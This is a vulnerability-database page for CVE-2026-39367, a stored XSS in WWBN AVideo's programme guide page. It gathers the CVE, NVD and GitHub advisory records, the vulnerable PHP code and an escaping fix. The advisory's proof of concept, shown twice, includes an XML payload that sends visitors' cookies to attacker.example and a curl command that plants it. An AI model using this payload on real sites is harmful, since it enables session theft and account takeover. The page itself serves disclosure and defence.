Vulnerability-Lookup

CVE-2026-39367 (GCVE-0-2026-39367)

Vulnerability from cvelistv5 – Published: 2026-04-07 19:22 – Updated: 2026-04-08 17:47

Title

WWBN AVideo has Stored XSS via Malicious EPG XML Program Titles in AVideo EPG Page

Summary

WWBN AVideo is an open source video platform. In versions 26.0 and prior, AVideo's EPG (Electronic Program Guide) feature parses XML from user-controlled URLs and renders programme titles directly into HTML without any sanitization or escaping. A user with upload permission can set a video's epg_link to a malicious XML file whose <title> elements contain JavaScript. This payload executes in the browser of any unauthenticated visitor to the public EPG page, enabling session hijacking and account takeover.

Severity ?

5.4 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Assigner

GitHub_M

References

URL

Tags

	https://github.com/WWBN/AVideo/security/advisorie…	x_refsource_CONFIRM
	https://github.com/WWBN/AVideo/commit/e0212add4aa…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	WWBN	AVideo	Affected: <= 26.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-39367",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-08T17:47:37.059400Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-08T17:47:40.548Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-rqp3-gf5h-mrqx"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "AVideo",
          "vendor": "WWBN",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c= 26.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "WWBN AVideo is an open source video platform. In versions 26.0 and prior, AVideo\u0027s EPG (Electronic Program Guide) feature parses XML from user-controlled URLs and renders programme titles directly into HTML without any sanitization or escaping. A user with upload permission can set a video\u0027s epg_link to a malicious XML file whose \u003ctitle\u003e elements contain JavaScript. This payload executes in the browser of any unauthenticated visitor to the public EPG page, enabling session hijacking and account takeover."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-07T19:22:07.732Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WWBN/AVideo/security/advisories/GHSA-rqp3-gf5h-mrqx",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-rqp3-gf5h-mrqx"
        },
        {
          "name": "https://github.com/WWBN/AVideo/commit/e0212add4aad0f1e97758a4b4fdc57df58ce68e8",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WWBN/AVideo/commit/e0212add4aad0f1e97758a4b4fdc57df58ce68e8"
        }
      ],
      "source": {
        "advisory": "GHSA-rqp3-gf5h-mrqx",
        "discovery": "UNKNOWN"
      },
      "title": "WWBN AVideo has Stored XSS via Malicious EPG XML Program Titles in AVideo EPG Page"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-39367",
    "datePublished": "2026-04-07T19:22:07.732Z",
    "dateReserved": "2026-04-06T21:29:17.350Z",
    "dateUpdated": "2026-04-08T17:47:40.548Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-39367\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-07T20:16:30.677\",\"lastModified\":\"2026-04-08T21:27:00.663\",\"vulnStatus\":\"Undergoing Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"WWBN AVideo is an open source video platform. In versions 26.0 and prior, AVideo\u0027s EPG (Electronic Program Guide) feature parses XML from user-controlled URLs and renders programme titles directly into HTML without any sanitization or escaping. A user with upload permission can set a video\u0027s epg_link to a malicious XML file whose \u003ctitle\u003e elements contain JavaScript. This payload executes in the browser of any unauthenticated visitor to the public EPG page, enabling session hijacking and account takeover.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\",\"baseScore\":5.4,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.3,\"impactScore\":2.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"references\":[{\"url\":\"https://github.com/WWBN/AVideo/commit/e0212add4aad0f1e97758a4b4fdc57df58ce68e8\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-rqp3-gf5h-mrqx\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/WWBN/AVideo/security/advisories/GHSA-rqp3-gf5h-mrqx\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-39367\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-08T17:47:37.059400Z\"}}}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-rqp3-gf5h-mrqx\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-08T17:47:26.181Z\"}}], \"cna\": {\"title\": \"WWBN AVideo has Stored XSS via Malicious EPG XML Program Titles in AVideo EPG Page\", \"source\": {\"advisory\": \"GHSA-rqp3-gf5h-mrqx\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 5.4, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"WWBN\", \"product\": \"AVideo\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c= 26.0\"}]}], \"references\": [{\"url\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-rqp3-gf5h-mrqx\", \"name\": \"https://github.com/WWBN/AVideo/security/advisories/GHSA-rqp3-gf5h-mrqx\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/WWBN/AVideo/commit/e0212add4aad0f1e97758a4b4fdc57df58ce68e8\", \"name\": \"https://github.com/WWBN/AVideo/commit/e0212add4aad0f1e97758a4b4fdc57df58ce68e8\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"WWBN AVideo is an open source video platform. In versions 26.0 and prior, AVideo\u0027s EPG (Electronic Program Guide) feature parses XML from user-controlled URLs and renders programme titles directly into HTML without any sanitization or escaping. A user with upload permission can set a video\u0027s epg_link to a malicious XML file whose \u003ctitle\u003e elements contain JavaScript. This payload executes in the browser of any unauthenticated visitor to the public EPG page, enabling session hijacking and account takeover.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-79\", \"description\": \"CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-07T19:22:07.732Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-39367\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-08T17:47:40.548Z\", \"dateReserved\": \"2026-04-06T21:29:17.350Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-07T19:22:07.732Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-39367

Vulnerability from fkie_nvd - Published: 2026-04-07 20:16 - Updated: 2026-04-08 21:27

Severity ?

5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/WWBN/AVideo/commit/e0212add4aad0f1e97758a4b4fdc57df58ce68e8
	security-advisories@github.com	https://github.com/WWBN/AVideo/security/advisories/GHSA-rqp3-gf5h-mrqx
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/WWBN/AVideo/security/advisories/GHSA-rqp3-gf5h-mrqx

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WWBN AVideo is an open source video platform. In versions 26.0 and prior, AVideo\u0027s EPG (Electronic Program Guide) feature parses XML from user-controlled URLs and renders programme titles directly into HTML without any sanitization or escaping. A user with upload permission can set a video\u0027s epg_link to a malicious XML file whose \u003ctitle\u003e elements contain JavaScript. This payload executes in the browser of any unauthenticated visitor to the public EPG page, enabling session hijacking and account takeover."
    }
  ],
  "id": "CVE-2026-39367",
  "lastModified": "2026-04-08T21:27:00.663",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 5.4,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.3,
        "impactScore": 2.7,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-04-07T20:16:30.677",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/WWBN/AVideo/commit/e0212add4aad0f1e97758a4b4fdc57df58ce68e8"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-rqp3-gf5h-mrqx"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-rqp3-gf5h-mrqx"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-RQP3-GF5H-MRQX

Vulnerability from github – Published: 2026-04-08 00:08 – Updated: 2026-04-08 00:08

Summary

WWBN AVideo has Stored XSS via Malicious EPG XML Program Titles in AVideo EPG Page

Details

Summary

AVideo's EPG (Electronic Program Guide) feature parses XML from user-controlled URLs and renders programme titles directly into HTML without any sanitization or escaping. A user with upload permission can set a video's epg_link to a malicious XML file whose <title> elements contain JavaScript. This payload executes in the browser of any unauthenticated visitor to the public EPG page, enabling session hijacking and account takeover.

Details

The vulnerability spans three files in the data flow:

1. Entry point — objects/videoAddNew.json.php:117-119

The epg_link parameter is stored with only a URL format check:

if (empty($_POST['epg_link']) || isValidURL($_POST['epg_link'])) {
    $obj->setEpg_link($_POST['epg_link']);
}

This requires User::canUpload() (line 10) — not admin, just basic upload permission.

2. XML parsing — objects/EpgParser.php:321

Programme titles are extracted as raw strings with no sanitization:

$this->epgdata[$grouper ?: 0] = [
    'title' => (string) $element->title,
    // ...
];

3. Sink — plugin/PlayerSkins/epg.php:343-351

Programme titles are interpolated directly into HTML output without htmlspecialchars() or any escaping:

} else if ($width <= $minimumWidth1Dot) {
    $text = "<abbr title=\"{$program['title']}\">.</abbr>";          // attribute injection
} else if ($width <= $minimumWidth) {
    $text = "<abbr title=\"{$program['title']}\"><small ...";        // attribute injection
} else if ($width <= $minimumSmallFont) {
    $text = "<small class=\"small-font\">{$program['title']}<div>..."; // HTML injection
} else {
    $text = "{$program['title']}<div>...";                            // HTML injection
}

Notably, the channel display-name is sanitized via safeString() at line 151, but programme titles are not — an apparent oversight.

The EPG page (epg.php) requires no authentication to access, and the rendered output is cached at line 634 (ObjectYPT::setCache), so the XSS payload persists in cache even if the original malicious XML is later removed.

PoC

Step 1: Host a malicious XMLTV file at an attacker-controlled URL:

<?xml version="1.0" encoding="UTF-8"?>
<tv>
  <channel id="ch1">
    <display-name>Test Channel</display-name>
  </channel>
  <programme start="20260404060000 +0000" stop="20260404070000 +0000" channel="ch1">
    <title><![CDATA[<img src=x onerror=fetch('https://attacker.example/steal?c='+document.cookie)>]]></title>
  </programme>
</tv>

Step 2: Create a video with the malicious EPG link (requires upload permission):

curl -s -b 'PHPSESSID=UPLOAD_USER_SESSION' \
  'https://target.example/objects/videoAddNew.json.php' \
  -d 'title=LiveStream&videoLink=https://example.com/stream.m3u8&epg_link=https://attacker.example/evil.xml&categories_id=1'

Step 3: Any visitor (unauthenticated) browsing the EPG page triggers the XSS:

https://target.example/plugin/PlayerSkins/epg.php

The <img onerror> payload executes in the browser of every visitor, exfiltrating cookies and session tokens.

Impact

Session hijacking: Any visitor's session cookies are exfiltrated, including administrators
Account takeover: Stolen admin sessions allow full platform control
Persistent: The XSS payload is cached server-side and fires for every page visitor without further interaction
Wide blast radius: The EPG page is publicly accessible with no authentication required

Recommended Fix

Escape all programme data before rendering in HTML. In plugin/PlayerSkins/epg.php, apply htmlspecialchars() to programme titles before interpolation:

// Around line 340, before the width checks:
$safeTitle = htmlspecialchars($program['title'], ENT_QUOTES, 'UTF-8');

// Then use $safeTitle instead of $program['title']:
} else if ($width <= $minimumWidth1Dot) {
    $text = "<abbr title=\"{$safeTitle}\">.</abbr>";
} else if ($width <= $minimumWidth) {
    $text = "<abbr title=\"{$safeTitle}\"><small class=\"duration\">{$minutes} Min</small></abbr>";
} else if ($width <= $minimumSmallFont) {
    $text = "<small class=\"small-font\">{$safeTitle}<div><small class=\"duration\">{$minutes} Min</small></div></small>";
} else {
    $text = "{$safeTitle}<div><small class=\"duration\">{$minutes} Min</small></div>";
}

Additionally, consider sanitizing all EPG XML fields at parse time in EpgParser.php:316-330 to defend in depth.

Severity ?

5.4 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "wwbn/avideo"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "26.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-39367"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-08T00:08:36Z",
    "nvd_published_at": "2026-04-07T20:16:30Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nAVideo\u0027s EPG (Electronic Program Guide) feature parses XML from user-controlled URLs and renders programme titles directly into HTML without any sanitization or escaping. A user with upload permission can set a video\u0027s `epg_link` to a malicious XML file whose `\u003ctitle\u003e` elements contain JavaScript. This payload executes in the browser of any unauthenticated visitor to the public EPG page, enabling session hijacking and account takeover.\n\n## Details\n\nThe vulnerability spans three files in the data flow:\n\n**1. Entry point \u2014 `objects/videoAddNew.json.php:117-119`**\n\nThe `epg_link` parameter is stored with only a URL format check:\n\n```php\nif (empty($_POST[\u0027epg_link\u0027]) || isValidURL($_POST[\u0027epg_link\u0027])) {\n    $obj-\u003esetEpg_link($_POST[\u0027epg_link\u0027]);\n}\n```\n\nThis requires `User::canUpload()` (line 10) \u2014 not admin, just basic upload permission.\n\n**2. XML parsing \u2014 `objects/EpgParser.php:321`**\n\nProgramme titles are extracted as raw strings with no sanitization:\n\n```php\n$this-\u003eepgdata[$grouper ?: 0] = [\n    \u0027title\u0027 =\u003e (string) $element-\u003etitle,\n    // ...\n];\n```\n\n**3. Sink \u2014 `plugin/PlayerSkins/epg.php:343-351`**\n\nProgramme titles are interpolated directly into HTML output without `htmlspecialchars()` or any escaping:\n\n```php\n} else if ($width \u003c= $minimumWidth1Dot) {\n    $text = \"\u003cabbr title=\\\"{$program[\u0027title\u0027]}\\\"\u003e.\u003c/abbr\u003e\";          // attribute injection\n} else if ($width \u003c= $minimumWidth) {\n    $text = \"\u003cabbr title=\\\"{$program[\u0027title\u0027]}\\\"\u003e\u003csmall ...\";        // attribute injection\n} else if ($width \u003c= $minimumSmallFont) {\n    $text = \"\u003csmall class=\\\"small-font\\\"\u003e{$program[\u0027title\u0027]}\u003cdiv\u003e...\"; // HTML injection\n} else {\n    $text = \"{$program[\u0027title\u0027]}\u003cdiv\u003e...\";                            // HTML injection\n}\n```\n\nNotably, the channel `display-name` **is** sanitized via `safeString()` at line 151, but programme titles are not \u2014 an apparent oversight.\n\nThe EPG page (`epg.php`) requires no authentication to access, and the rendered output is cached at line 634 (`ObjectYPT::setCache`), so the XSS payload persists in cache even if the original malicious XML is later removed.\n\n## PoC\n\n**Step 1:** Host a malicious XMLTV file at an attacker-controlled URL:\n\n```xml\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\n\u003ctv\u003e\n  \u003cchannel id=\"ch1\"\u003e\n    \u003cdisplay-name\u003eTest Channel\u003c/display-name\u003e\n  \u003c/channel\u003e\n  \u003cprogramme start=\"20260404060000 +0000\" stop=\"20260404070000 +0000\" channel=\"ch1\"\u003e\n    \u003ctitle\u003e\u003c![CDATA[\u003cimg src=x onerror=fetch(\u0027https://attacker.example/steal?c=\u0027+document.cookie)\u003e]]\u003e\u003c/title\u003e\n  \u003c/programme\u003e\n\u003c/tv\u003e\n```\n\n**Step 2:** Create a video with the malicious EPG link (requires upload permission):\n\n```bash\ncurl -s -b \u0027PHPSESSID=UPLOAD_USER_SESSION\u0027 \\\n  \u0027https://target.example/objects/videoAddNew.json.php\u0027 \\\n  -d \u0027title=LiveStream\u0026videoLink=https://example.com/stream.m3u8\u0026epg_link=https://attacker.example/evil.xml\u0026categories_id=1\u0027\n```\n\n**Step 3:** Any visitor (unauthenticated) browsing the EPG page triggers the XSS:\n\n```\nhttps://target.example/plugin/PlayerSkins/epg.php\n```\n\nThe `\u003cimg onerror\u003e` payload executes in the browser of every visitor, exfiltrating cookies and session tokens.\n\n## Impact\n\n- **Session hijacking**: Any visitor\u0027s session cookies are exfiltrated, including administrators\n- **Account takeover**: Stolen admin sessions allow full platform control\n- **Persistent**: The XSS payload is cached server-side and fires for every page visitor without further interaction\n- **Wide blast radius**: The EPG page is publicly accessible with no authentication required\n\n## Recommended Fix\n\nEscape all programme data before rendering in HTML. In `plugin/PlayerSkins/epg.php`, apply `htmlspecialchars()` to programme titles before interpolation:\n\n```php\n// Around line 340, before the width checks:\n$safeTitle = htmlspecialchars($program[\u0027title\u0027], ENT_QUOTES, \u0027UTF-8\u0027);\n\n// Then use $safeTitle instead of $program[\u0027title\u0027]:\n} else if ($width \u003c= $minimumWidth1Dot) {\n    $text = \"\u003cabbr title=\\\"{$safeTitle}\\\"\u003e.\u003c/abbr\u003e\";\n} else if ($width \u003c= $minimumWidth) {\n    $text = \"\u003cabbr title=\\\"{$safeTitle}\\\"\u003e\u003csmall class=\\\"duration\\\"\u003e{$minutes} Min\u003c/small\u003e\u003c/abbr\u003e\";\n} else if ($width \u003c= $minimumSmallFont) {\n    $text = \"\u003csmall class=\\\"small-font\\\"\u003e{$safeTitle}\u003cdiv\u003e\u003csmall class=\\\"duration\\\"\u003e{$minutes} Min\u003c/small\u003e\u003c/div\u003e\u003c/small\u003e\";\n} else {\n    $text = \"{$safeTitle}\u003cdiv\u003e\u003csmall class=\\\"duration\\\"\u003e{$minutes} Min\u003c/small\u003e\u003c/div\u003e\";\n}\n```\n\nAdditionally, consider sanitizing all EPG XML fields at parse time in `EpgParser.php:316-330` to defend in depth.",
  "id": "GHSA-rqp3-gf5h-mrqx",
  "modified": "2026-04-08T00:08:36Z",
  "published": "2026-04-08T00:08:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-rqp3-gf5h-mrqx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39367"
    },
    {
      "type": "WEB",
      "url": "https://github.com/WWBN/AVideo/commit/e0212add4aad0f1e97758a4b4fdc57df58ce68e8"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/WWBN/AVideo"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "WWBN AVideo has Stored XSS via Malicious EPG XML Program Titles in AVideo EPG Page"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-39367 (GCVE-0-2026-39367)

FKIE_CVE-2026-39367

GHSA-RQP3-GF5H-MRQX

Summary

Details

PoC

Impact

Recommended Fix

Tags

Sightings

Nomenclature